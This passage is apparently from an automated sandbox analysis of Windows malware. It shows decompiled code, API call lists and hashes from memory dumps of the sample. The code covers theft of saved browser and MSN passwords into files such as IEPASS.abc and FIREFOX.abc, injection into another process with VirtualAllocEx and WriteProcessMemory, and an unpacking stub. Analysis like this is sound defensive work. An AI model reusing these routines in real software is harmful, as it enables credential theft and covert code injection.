                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v36);
                                    										E00401D58( &_v36, "MSN.abc");
                                    										_t297 =  *0x40f1ec;
                                    										_pop(_t282);
                                    										E00405D70(_v36, _t267, _t282,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409EF8( &_v40, _t267, _t297, _t320, _t323);
                                    									E00401B14(0x40f1ec, _v40);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v44);
                                    										E00401D58( &_v44, "FIREFOX.abc");
                                    										_pop(_t281);
                                    										E00405D70(_v44, _t267, _t281,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A84( &_v48);
                                    									E00401B14(0x40f1ec, _v48);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v52);
                                    										E00401D58( &_v52, "IELOGIN.abc");
                                    										_pop(_t280);
                                    										E00405D70(_v52, _t267, _t280,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A90( &_v56);
                                    									E00401B14(0x40f1ec, _v56);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v60);
                                    										E00401D58( &_v60, "IEPASS.abc");
                                    										_pop(_t279);
                                    										E00405D70(_v60, _t267, _t279,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409A9C( &_v64, _t320, _t323, __eflags, _t335);
                                    									E00401B14(0x40f1ec, _v64);
                                    									__eflags =  *0x40f1ec;
                                    									if(__eflags != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v68);
                                    										E00401D58( &_v68, "IEAUTO.abc");
                                    										_pop(_t278);
                                    										E00405D70(_v68, _t267, _t278,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409AB8( &_v72, _t320, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v72);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v76);
                                    										E00401D58( &_v76, "IEWEB.abc");
                                    										_pop(_t277);
                                    										E00405D70(_v76, _t267, _t277,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									goto L44;
                                    								}
                                    								_t325 = _t71 >> 1;
                                    								goto L67;
                                    							}
                                    							_t261 =  *_t322;
                                    							_t322 = _t322 - 0xfffffffc;
                                    							asm("adc ebx, ebx");
                                    							if(_t322 < 0) {
                                    								goto L62;
                                    							}
                                    							L56:
                                    							_t65 = _t65 - 1;
                                    							_t259 = _t261 + _t261;
                                    							if(_t259 == 0) {
                                    								_t259 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    						}
                                    						L47:
                                    						_t259 = _t259 + _t259;
                                    						__eflags = _t259;
                                    					} while (_t259 != 0);
                                    				}
                                    			}
                                    0x00455c10
                                    0x00455c10
                                    0x00455c10
                                    0x00455c11
                                    0x00455c16
                                    0x00455c16
                                    0x00455c1c
                                    0x00455c1d
                                    0x00455c32
                                    0x00455c32
                                    0x00455c34
                                    0x00455c37
                                    0x00455c39
                                    0x00455c39
                                    0x00455c28
                                    0x00455c2a
                                    0x00455c2b
                                    0x00455c2d
                                    0x00455c2d
                                    0x00000000
                                    0x00455c2d
                                    0x00455c3b
                                    0x00455c40
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c51
                                    0x00455c51
                                    0x00455c7b
                                    0x00455c7b
                                    0x00455c7d
                                    0x00455c7d
                                    0x00455c80
                                    0x00455c93
                                    0x00455c93
                                    0x00455c95
                                    0x00455c97
                                    0x00455c99
                                    0x00455c9c
                                    0x00455c9c
                                    0x00455c9e
                                    0x00455c9e
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6c
                                    0x00455c6e
                                    0x00455c70
                                    0x00455c72
                                    0x00455c75
                                    0x00455c75
                                    0x00455c77
                                    0x00455ccd
                                    0x00455ccd
                                    0x00455cd3
                                    0x00455cd6
                                    0x00455cd9
                                    0x00455cdc
                                    0x00455cec
                                    0x00455cec
                                    0x00455cee
                                    0x00455cf1
                                    0x00455cf3
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cf6
                                    0x00455cfb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00455cde
                                    0x00455cde
                                    0x00455cde
                                    0x00455ce0
                                    0x00455ce1
                                    0x00455ce3
                                    0x00455ce4
                                    0x00455ce4
                                    0x00455ce4
                                    0x00000000
                                    0x00455ce7
                                    0x00455ca0
                                    0x00455ca1
                                    0x00455ca1
                                    0x00455ca3
                                    0x00455ca5
                                    0x00455ca7
                                    0x00455caa
                                    0x00455caa
                                    0x00455cac
                                    0x00000000
                                    0x00455cae
                                    0x00000000
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cae
                                    0x00455cb0
                                    0x00455cb2
                                    0x00455cb4
                                    0x00455cb7
                                    0x00455cb7
                                    0x00455cb9
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbb
                                    0x00455cbf
                                    0x00000000
                                    0x00000000
                                    0x00455cc1
                                    0x00455cc3
                                    0x00455cc3
                                    0x00455cc6
                                    0x00455cc6
                                    0x00455cca
                                    0x00455cca
                                    0x00000000
                                    0x00455cca
                                    0x00455cac
                                    0x00455c85
                                    0x00455c87
                                    0x00455c88
                                    0x00455c88
                                    0x00455c8b
                                    0x00455d02
                                    0x00455d03
                                    0x00455d05
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0a
                                    0x00455d0c
                                    0x00455d0f
                                    0x00455d0f
                                    0x00455d13
                                    0x00455d13
                                    0x00455d21
                                    0x00455d2d
                                    0x00455d2f
                                    0x00455d34
                                    0x00455d36
                                    0x00455d36
                                    0x00455d3c
                                    0x00455d3c
                                    0x00455d3e
                                    0x00455d3e
                                    0x00455d40
                                    0x00000000
                                    0x00000000
                                    0x00455d42
                                    0x00455d4c
                                    0x00455d4f
                                    0x00455d4f
                                    0x00455d58
                                    0x00455d59
                                    0x00455d5b
                                    0x00455d5c
                                    0x00455d5c
                                    0x00455d5e
                                    0x00000000
                                    0x00000000
                                    0x00455d64
                                    0x00455d6d
                                    0x00455d6d
                                    0x00455d6f
                                    0x00455d78
                                    0x00455d78
                                    0x00455d71
                                    0x00455d73
                                    0x00455d73
                                    0x00455d59
                                    0x00455d7e
                                    0x00455d84
                                    0x00455d84
                                    0x00455d95
                                    0x00455d97
                                    0x00455d97
                                    0x00455d9d
                                    0x00455da0
                                    0x00455da0
                                    0x00455da0
                                    0x00455da4
                                    0x00455da5
                                    0x00455daa
                                    0x00455dad
                                    0x00455dae
                                    0x00455db2
                                    0x00455db2
                                    0x00455db4
                                    0x00455db4
                                    0x00455db8
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc03
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc2c
                                    0x0040bc31
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000
                                    0x0040be60
                                    0x00455c8f
                                    0x00000000
                                    0x00455c8f
                                    0x00455c53
                                    0x00455c55
                                    0x00455c58
                                    0x00455c5a
                                    0x00000000
                                    0x00000000
                                    0x00455c5c
                                    0x00455c5c
                                    0x00455c5d
                                    0x00455c5f
                                    0x00455c61
                                    0x00455c63
                                    0x00455c66
                                    0x00455c66
                                    0x00455c68
                                    0x00455c40
                                    0x00455c42
                                    0x00455c44
                                    0x00455c46
                                    0x00455c49
                                    0x00455c49
                                    0x00455c4b
                                    0x00455c4d
                                    0x00455c4d
                                    0x00455c4f
                                    0x00000000
                                    0x00000000
                                    0x00455c4f
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c2e
                                    0x00455c39

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 00455D52
                                    • GetProcAddress.KERNEL32(?,0044FFF9), ref: 00455D67
                                    • ExitProcess.KERNEL32(?,0044FFF9), ref: 00455D78
                                    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,7479411C), ref: 00455D95
                                    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 00455DAA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction ID: 60ef33331dc92bd8925b533821660d0d47773761dcb7daf1aaa77766f171e575
                                    • Opcode Fuzzy Hash: 1b49cd49f4b3ff30f44718b813f7942b65de8ba62b68aa779a841e8e32909795
                                    • Instruction Fuzzy Hash: 2E511A72951B124BD7214EB89CE46B577A4EB12336728073ACDE1C73C7E7A8580E8758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				char _v13;
                                    				intOrPtr _v20;
                                    				void* _v24;
                                    				long _v28;
                                    				intOrPtr _v36;
                                    				long _v44;
                                    				void* _v48;
                                    				void* _t38;
                                    				void* _t42;
                                    				void* _t49;
                                    				void* _t55;
                                    				void* _t57;
                                    				intOrPtr _t64;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				void* _t74;
                                    				void* _t76;
                                    				void* _t79;
                                    				intOrPtr* _t80;
                                    
                                    				_t80 = _t79 + 0xffffffd4;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_t64 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v48, _t64);
                                    				_push(_t79);
                                    				_push(0x404205);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t80;
                                    				_v13 = 0;
                                    				_push(0);
                                    				_push(_v12);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
                                    				_t76 = 0x10000000;
                                    				do {
                                    					_t76 = _t76 + 0x10000;
                                    					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
                                    					_t57 = _t38;
                                    					if(_t57 != 0) {
                                    						VirtualFree(_t57, 0, 0x8000); // executed
                                    						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
                                    						_t57 = _t55;
                                    					}
                                    				} while (_t57 == 0 && _t76 <= 0x30000000);
                                    				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
                                    				_t42 = _v48;
                                    				if(_t42 != 0) {
                                    					_v24 = _t42;
                                    					_v20 = _v36;
                                    					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
                                    					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
                                    					if(_t49 != 0) {
                                    						_v13 = 1;
                                    					}
                                    				}
                                    				_pop(_t67);
                                    				 *[fs:eax] = _t67;
                                    				_push(E0040420C);
                                    				_t68 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v48, _t68);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				void* _t28;
                                    				intOrPtr _t41;
                                    				intOrPtr _t45;
                                    				intOrPtr _t50;
                                    				intOrPtr _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __eflags;
                                    				_t48 = __esi;
                                    				_t47 = __edi;
                                    				_t50 = _t51;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_push(_t50);
                                    				_push(0x405607);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_push(_t50);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				_v8 = 0x100;
                                    				E00402074( &_v12, _v8);
                                    				GetUserNameA(E00401F48(_v12),  &_v8); // executed
                                    				_pop(_t41);
                                    				 *[fs:eax] = _t41;
                                    				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
                                    				_push(_v16);
                                    				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
                                    				_pop(_t28);
                                    				E00401E94(_t28, _v20);
                                    				_t45 = 0x4055b2;
                                    				 *[fs:eax] = _t45;
                                    				_push(E0040560E);
                                    				return E00401AE4( &_v20, 3);
                                    			}

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
                                    				signed char _t26;
                                    				void* _t32;
                                    				intOrPtr* _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				signed int _t49;
                                    				signed char _t55;
                                    				intOrPtr _t58;
                                    				void* _t60;
                                    				signed char* _t61;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    
                                    				_t61 = __edi;
                                    				_t55 = __edx;
                                    				_t49 = __ecx;
                                    				_t48 = __ebx;
                                    				asm("aaa");
                                    				 *__ecx =  *__ecx + __edx;
                                    				_t26 = __eax + 0x00000001 | 0x00000054;
                                    				_push(__ebx);
                                    				if(_t26 == 0) {
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t67;
                                    					E00401CAC(_t65 - 8, __ebx);
                                    					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
                                    					E00401CAC(_t65 - 0xc, __ebx);
                                    					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
                                    					_pop(_t58);
                                    					 *[fs:eax] = _t58;
                                    					_push(E00403871);
                                    					return E00401AE4(_t65 - 0xc, 2);
                                    				} else {
                                    					_t66 =  *(__esi + 0x67) * 0x61727241;
                                    					if(_t66 < 0) {
                                    						 *_t26 =  *_t26 + _t26;
                                    						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
                                    					}
                                    					asm("adc [eax], al");
                                    					_t43 = _t26 - 1;
                                    					 *_t43 =  *_t43 + _t43;
                                    					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
                                    					 *_t49 =  *_t49 + _t55;
                                    					_push(_t66);
                                    					asm("outsb");
                                    					asm("aaa");
                                    					_t45 = _t43 + 2;
                                    					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
                                    					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
                                    					asm("bound ecx, [ecx+0x6e]");
                                    					asm("outsw");
                                    					asm("adc al, 0x0");
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t61 = _t55;
                                    					_t46 = _t45 + 1;
                                    					 *_t46 =  *_t46 + _t55;
                                    					 *_t46 =  *_t46 + _t46;
                                    					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
                                    					_t60 = 0;
                                    					do {
                                    						_t60 = _t60 + 1;
                                    					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
                                    					return _t60;
                                    				}
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				void* _t14;
                                    				void* _t26;
                                    				intOrPtr _t33;
                                    				void* _t38;
                                    				intOrPtr _t41;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t26 = __edx;
                                    				_t38 = __eax;
                                    				_push(_t41);
                                    				_push(0x40386a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t41;
                                    				E00401CAC( &_v12, __edx);
                                    				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
                                    				E00401CAC( &_v16, _t26);
                                    				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00403871);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _WIN32_FIND_DATAA _v328;
                                    				void* _t13;
                                    				intOrPtr _t23;
                                    				void* _t26;
                                    
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t26);
                                    				_push(0x405d61);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t26 + 0xfffffebc;
                                    				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
                                    				if(_t13 != 0xffffffff) {
                                    					FindClose(_t13);
                                    				}
                                    				_pop(_t23);
                                    				 *[fs:eax] = _t23;
                                    				_push(E00405D68);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
